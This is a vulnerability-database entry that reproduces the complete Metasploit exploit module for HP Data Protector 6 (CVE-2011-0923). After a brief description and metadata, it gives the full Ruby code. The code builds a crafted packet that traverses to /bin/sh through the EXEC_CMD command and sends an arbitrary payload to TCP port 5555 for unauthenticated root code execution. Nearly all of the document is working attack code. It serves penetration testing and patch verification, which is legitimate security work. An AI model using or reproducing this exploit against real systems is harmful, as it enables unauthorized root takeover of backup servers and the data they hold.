HP Data Protector 6 EXEC_CMD Remote Code Execution

2012-02-24T18:06:47
ID MSF:EXPLOIT/LINUX/MISC/HP_DATA_PROTECTOR_CMD_EXEC
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This exploit abuses a vulnerability in the HP Data Protector service. This flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD command and traverse back to /bin/sh, this allows arbitrary remote code execution under the context of root.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'HP Data Protector 6 EXEC_CMD Remote Code Execution',
      'Description'     => %q{
        This exploit abuses a vulnerability in the HP Data Protector service. This
        flaw allows an unauthenticated attacker to take advantage of the EXEC_CMD
        command and traverse back to /bin/sh, this allows arbitrary remote code
        execution under the context of root.
      },
      'Author'          =>
        [
          'ch0ks',          # poc
          'c4an',           # msf poc
          'wireghoul',      # Improved msf
          'Javier Ignacio'  #Verified on A06.20
        ],
      'References'      =>
        [
          [ 'CVE', '2011-0923'],
          [ 'OSVDB', '72526'],
          [ 'ZDI', '11-055'],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
          [ 'URL', 'https://community.rapid7.com/thread/2253' ]
        ],
      'DisclosureDate'  => 'Feb 7 2011',
      'Platform'        => %w{ linux unix },
      'Arch'            => ARCH_CMD,
      'Payload'         =>
        {
          'Space'       => 10000,
          'DisableNops' => true,
          'Compat'      => { 'PayloadType' => 'cmd' }
        },
      'Targets'         =>
        [
          [ 'HP Data Protector 6.10/6.11/6.20 on Linux', {}]
        ],
      'DefaultTarget'   => 0
    ))

    register_options([Opt::RPORT(5555),])
  end

  def exploit

    user = rand_text_alpha(4)

    packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
    packet << user*2
    packet << "\x00\x20\x30\x00\x20"
    packet << "SYSTEM"
    packet << "\x00\x20\x63\x34\x61\x6e"
    packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
    packet << user
    packet << "\x20\x20\x20\x20\x00\x20"
    packet << "\x50\x6f\x63"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
    packet << "../../../../../../../../../../"

    shell_mio = "bin/sh"

    shell = shell_mio
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << payload.encoded
    shell << "\n"

    sploit = packet + shell

    begin
      print_status("Sending our commmand...")
      connect
      sock.put(sploit)
      print_status("Waiting ...")
      handler

      # Read command output from socket if cmd/unix/generic payload was used
      if (datastore['CMD'])
        res = sock.get_once(-1, 10)
        print_status(res.to_s) if not res.empty?
      end

    rescue
      print_error("Error in connection or socket")
    ensure
      disconnect
    end
  end
end